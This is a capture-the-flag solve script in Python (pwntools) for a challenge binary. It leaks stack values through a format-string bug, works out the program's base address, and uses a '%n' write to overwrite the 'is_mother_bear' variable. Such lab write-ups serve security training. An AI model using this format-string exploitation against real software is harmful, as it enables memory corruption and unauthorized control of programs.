/..

#CONTENT

#TOP

solve.py
PYTHON
   1 
 

   2 
 

   3 
 

   4 
 

   5 
 

   6 
 

   7 
 

   8 
 

   9 
 

  10 
 

  11 
 

  12 
 

  13 
 

  14 
 

  15 
 

  16 
 

  17 
 

  18 
 

  19 
 

  20 
 

  21 
 

  22 
 

  23 
 

  24 
 

  25 
 

  26 
 

  27 
 

  28 
 

  29 
 

  30 
 

  31 
 

  32 
 

  33 
 

  34 
 

  35 
 

  36 
 

  37 
 

  38 
 

  39 
 

  40 
 

  41 
 


from pwn import *

name = "../chal/chal"
file = ELF(name)

if args.REMOTE or args.HOST or args.PORT:
    p = remote(args.HOST or "localhost", args.PORT or "5000")
else:
    raise Exception("not implemented")

delim = b"say: "

leaks = []
for i in range(1, 64):
    payload =  f"%{i}$p *".encode()
    payload =  payload.ljust(8, b"B")
    payload += b"A" * 8

    p.sendlineafter(delim, payload)
    p.recvuntil(b"* ")

    resp = p.recvuntil(b" *", drop=True)

    if resp.startswith(b"("):
        leak = 0
    else:
        leak = int(resp, 16)
    leaks.append(leak)

    log.info(f"[{i:02d}] = {leak:#x}")

# payload+8 at index 23
filebase = leaks[14] - 0x1675
log.info(f"filebase = {filebase:#x}")
    
payload =  b"%c%23$n"
payload =  payload.ljust(8, b"\x00")
payload += p64(filebase + file.sym.is_mother_bear)
p.sendlineafter(delim, payload)

p.interactive()